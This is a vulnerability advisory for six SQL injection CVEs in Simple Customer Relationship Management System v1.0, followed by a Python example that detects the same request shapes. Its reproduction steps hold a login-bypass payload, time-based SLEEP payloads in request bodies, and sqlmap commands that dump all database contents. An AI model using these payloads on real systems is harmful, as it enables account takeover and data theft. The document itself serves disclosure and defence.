Created: February 9, 2023 14:47
# Simple Customer Relationship Management System v1.0 - SQL Injection Vulnerability
## Multiple SQL Injection Vulnerabilities found in Simple Customer Relationship Management System version 1.0.
**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter under the Admin Panel.
**Steps to Reproduce:-**
> 1. Navigate to the Admin Panel by following the URL: http://localhost/php-scrm/admin/
> 2. Insert the below-given payload in the username field and any random digits/string like "test" in the password field, then click on the "Login" button to take over the admin account.
> Payload: `' or 1 = 1 -- -`
**Reference: CVE-2023-24364**
**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the Description parameter under the Create Ticket function.
**Steps to Reproduce:-**
> 1. Register a user by navigating to the URL: http://localhost/php-scrm/registration.php
> 2. Log in as the registered user with valid credentials by following the URL: http://localhost/php-scrm/login.php
> 3. Navigate to the Create Ticket page by following the URL: http://localhost/php-scrm/create-ticket.php
> 4. Fill out the Create Ticket form, then intercept the request in Burp Suite.
> 5. Send the intercepted request to Burp Repeater.
> Payload: `' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc`
> 6. Insert the URL-encoded payload in the description parameter:
>
> `subject=newticket&tasktype=Option+1&priority=important&description=newdescriptiontest'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&send=Send`
>
> 7. Click on the "Send" button to send the request.
> 8. The response is delayed by 10 seconds, which confirms that the parameter is vulnerable to SQL injection.
> 9. Dump data by using sqlmap, as follows.
> 10. Copy the Burp-intercepted request into a file named crm-create-ticket-request.txt
> 11. Enumerate the databases with sqlmap:
> `# python sqlmap.py -r crm-create-ticket-request.txt -p description --dbs --batch`
> 12. Dump all data with sqlmap:
> `# python sqlmap.py -r crm-create-ticket-request.txt -p description --dump-all --batch`
**Reference: CVE-2023-24652**
**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the oldpass parameter under the Change Password function.
**Steps to Reproduce:-**
> 1. Register a user by navigating to the URL: http://localhost/php-scrm/registration.php
> 2. Log in as the registered user with valid credentials by following the URL: http://localhost/php-scrm/login.php
> 3. Navigate to the Change Password page by following the URL: http://localhost/php-scrm/change-password.php
> 4. Fill out the Change Password form: put random digits/string like "test123" in the "Current Password" field and random content like "123456" in the "New Password" and "Confirm Password" fields, then intercept the request in Burp Suite.
> 5. Send the intercepted request to Burp Repeater.
> 6. Insert the below-given payload in the oldpass parameter, then click on the "Send" button to send the request.
> Payload: `oldpass=test123'+AND+(SELECT+123+FROM+(SELECT(SLEEP(10)))abc)+AND'&newpass=123456&confirmpassword=123456&change=change`
> 7. The response is delayed by 10 seconds, which confirms that the parameter is vulnerable to SQL injection.
> 8. Dump data by using sqlmap, as follows.
> 9. Copy the Burp-intercepted request into a file named crm-request.txt:
>
> ```http
> POST /php-scrm/change-password.php HTTP/1.1
> Host: localhost
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 65
> Origin: http://localhost
> Connection: close
> Referer: http://localhost/php-scrm/change-password.php
> Cookie: PHPSESSID=65c7e25jf215pltjkg8gr5kli9
> Upgrade-Insecure-Requests: 1
> Sec-Fetch-Dest: document
> Sec-Fetch-Mode: navigate
> Sec-Fetch-Site: same-origin
> Sec-Fetch-User: ?1
>
> oldpass=test123&newpass=123456&confirmpassword=123456&change=Change
> ```
>
> 10. Enumerate the databases with sqlmap:
> `# python sqlmap.py -r crm-request.txt -p oldpass --dbs --batch`
> 11. Dump all data with sqlmap:
> `# python sqlmap.py -r crm-request.txt -p oldpass --dump-all --batch`
**Reference: CVE-2023-24653**
**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Request a Quote function.
**Steps to Reproduce:-**
> 1. Register a user by navigating to the URL: http://localhost/php-scrm/registration.php
> 2. Log in as the registered user with valid credentials by following the URL: http://localhost/php-scrm/login.php
> 3. Navigate to the Request a Quote page by following the URL: http://localhost/php-scrm/get-quote.php
> 4. Fill out the Quote Request form, then intercept the request in Burp Suite.
> 5. Send the intercepted request to Burp Repeater.
> Payload: `' AND (SELECT 123456 FROM (SELECT(SLEEP(5)))xyz) AND 'abc'='abc`
> 6. Insert the payload in the name parameter of the multipart form body:
>
> ```
> Content-Disposition: form-data; name="name"
>
> test1' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
> ```
>
> 7. Click on the "Send" button to send the request.
> 8. The response is delayed by 10 seconds, which confirms that the parameter is vulnerable to SQL injection.
> 9. Dump data by using sqlmap, as follows.
> 10. Copy the Burp-intercepted request into a file named crm-quote-request.txt
> 11. Enumerate the databases with sqlmap:
> `# python sqlmap.py -r crm-quote-request.txt -p name --dbs --batch`
> 12. Dump all data with sqlmap:
> `# python sqlmap.py -r crm-quote-request.txt -p name --dump-all --batch`
**Reference: CVE-2023-24654**
**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Profile Update function.
**Steps to Reproduce:-**
> 1. Register a user by navigating to the URL: http://localhost/php-scrm/registration.php
> 2. Log in as the registered user with valid credentials by following the URL: http://localhost/php-scrm/login.php
> 3. Navigate to the Profile Update page by following the URL: http://localhost/php-scrm/profile.php
> 4. Fill out your profile form, then intercept the request in Burp Suite.
> 5. Send the intercepted request to Burp Repeater.
> Payload: `' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc`
> 6. Insert the payload in the name parameter of the multipart form body:
>
> ```
> Content-Disposition: form-data; name="name"
>
> user1' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
> ```
>
> 7. Click on the "Send" button to send the request.
> 8. The response is delayed by 10 seconds, which confirms that the parameter is vulnerable to SQL injection.
> 9. Dump data by using sqlmap, as follows.
> 10. Copy the Burp-intercepted request into a file named crm-profile-request.txt
> 11. Enumerate the databases with sqlmap:
> `# python sqlmap.py -r crm-profile-request.txt -p name --dbs --batch`
> 12. Dump all data with sqlmap:
> `# python sqlmap.py -r crm-profile-request.txt -p name --dump-all --batch`
**Reference: CVE-2023-24655**
**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the subject parameter under the Create Ticket function.
**Steps to Reproduce:-**
> 1. Register a user by navigating to the URL: http://localhost/php-scrm/registration.php
> 2. Log in as the registered user with valid credentials by following the URL: http://localhost/php-scrm/login.php
> 3. Navigate to the Create Ticket page by following the URL: http://localhost/php-scrm/create-ticket.php
> 4. Fill out the Create Ticket form, then intercept the request in Burp Suite.
> 5. Send the intercepted request to Burp Repeater.
> Payload: `' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc`
> 6. Insert the URL-encoded payload in the subject parameter:
>
> `subject=newticket'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&tasktype=Option+1&priority=important&description=newdescriptiontest&send=Send`
>
> 7. Click on the "Send" button to send the request.
> 8. The response is delayed by 10 seconds, which confirms that the parameter is vulnerable to SQL injection.
> 9. Dump data by using sqlmap, as follows.
> 10. Copy the Burp-intercepted request into a file named crm-create-ticket-request.txt
> 11. Enumerate the databases with sqlmap:
> `# python sqlmap.py -r crm-create-ticket-request.txt -p subject --dbs --batch`
> 12. Dump all data with sqlmap:
> `# python sqlmap.py -r crm-create-ticket-request.txt -p subject --dump-all --batch`
**Reference: CVE-2023-24656**
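All six issues above share the same request shapes: a single quote breaking out of a string literal followed by a boolean comparison (the admin login), and `SLEEP(n)` inside a sub-SELECT whose success is confirmed by the response delay in step 8 of each procedure. The following Python is an added detection example for the defending side; it is not code from the advisory or from the php-scrm project. It decodes URL-encoded form bodies the way PHP's `$_POST` sees them, flags field values carrying those indicators, and turns the advisory's "delayed by 10 seconds" confirmation into a timing rule that a proxy or WAF log review could apply. The sample bodies are constructed: the create-ticket and change-password bodies are copied from the advisory, while the admin login form's field names (`username`, `password`) are an assumption, since the advisory names only the username parameter. The same `scan_value` check applies unchanged to the multipart field values shown for the get-quote and profile forms.

```python
"""Detection logic for the SQL-injection request shapes quoted in this
advisory (added example; not code from the advisory or from php-scrm)."""
import re
from urllib.parse import parse_qs

# Indicator patterns written against the payload shapes in the advisory.
INDICATORS = {
    # ' or 1 = 1   /   ) AND 'abc'='abc
    "boolean_tautology": re.compile(
        r"[')]\s*(?:or|and)\s+'?\w+'?\s*=\s*'?\w+'?", re.IGNORECASE),
    # -- -   /   -- abc   /   /* ... */
    "comment_terminator": re.compile(r"--\s|/\*"),
    # (SELECT 123456 FROM ...
    "subselect": re.compile(r"\(\s*SELECT\b", re.IGNORECASE),
    # SLEEP(10)
    "time_based_sleep": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.IGNORECASE),
}

# Constructed sample bodies. create_ticket and change_password are the
# advisory's own; the admin_login field names are an assumption.
SAMPLE_BODIES = {
    "admin_login": "username=%27+or+1+%3D+1+--+-&password=test",
    "create_ticket": ("subject=newticket&tasktype=Option+1&priority=important"
                      "&description=newdescriptiontest'+AND+(SELECT+123456+FROM+"
                      "(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&send=Send"),
    "change_password": ("oldpass=test123'+AND+(SELECT+123+FROM+(SELECT(SLEEP(10)))abc)"
                        "+AND'&newpass=123456&confirmpassword=123456&change=change"),
    # Benign ticket: a lone apostrophe in ordinary text must not trip the rules.
    "benign_ticket": ("subject=Printer+broken&tasktype=Option+1&priority=important"
                      "&description=Paper+jam+in+tray+2%2C+it's+urgent&send=Send"),
}


def decode_form_body(body: str) -> dict[str, list[str]]:
    """Decode a form body: '+' -> space, %XX escapes resolved, repeated keys kept."""
    return parse_qs(body, keep_blank_values=True)


def scan_value(value: str) -> list[str]:
    """Names of every indicator matching one decoded field value (sorted)."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(value))


def scan_form_body(body: str) -> dict[str, list[str]]:
    """Map each parameter that trips at least one rule to its indicator names."""
    hits = {}
    for param, values in decode_form_body(body).items():
        found = sorted({ind for v in values for ind in scan_value(v)})
        if found:
            hits[param] = found
    return hits


def sleep_seconds(value: str) -> int:
    """Largest n in any SLEEP(n) inside the value, 0 when there is none."""
    found = re.findall(r"\bSLEEP\s*\(\s*(\d+)\s*\)", value, re.IGNORECASE)
    return max((int(n) for n in found), default=0)


def time_based_confirmed(body: str, elapsed_s: float, baseline_s: float,
                         tolerance: float = 0.8) -> bool:
    """True when a SLEEP(n) payload is present AND the response took at least
    tolerance*n seconds longer than the endpoint's baseline. A payload that
    arrives but causes no delay (e.g. a patched endpoint) yields False."""
    expected = max((sleep_seconds(v)
                    for values in decode_form_body(body).values()
                    for v in values), default=0)
    return expected > 0 and (elapsed_s - baseline_s) >= tolerance * expected


if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(f"{name}: {scan_form_body(body) or 'clean'}")
    # Step 8 of the advisory as a rule: ~10 s extra latency on a SLEEP(10) request.
    print(time_based_confirmed(SAMPLE_BODIES["create_ticket"], 10.4, 0.2))  # True
    print(time_based_confirmed(SAMPLE_BODIES["create_ticket"], 0.3, 0.2))   # False
```

Matching on decoded values matters: the payloads arrive as `%27`, `+` and `%3d`, so a rule applied to the raw body would miss them. The timing rule compares against a per-endpoint baseline rather than a fixed threshold, because a slow page on its own is not evidence of injection; only the combination of a `SLEEP(n)` indicator and a delay close to `n` seconds reproduces the advisory's confirmation step. Detection is a stopgap: the fix for all six CVEs is to pass user input to the database only through parameterized queries (mysqli or PDO prepared statements) instead of string concatenation.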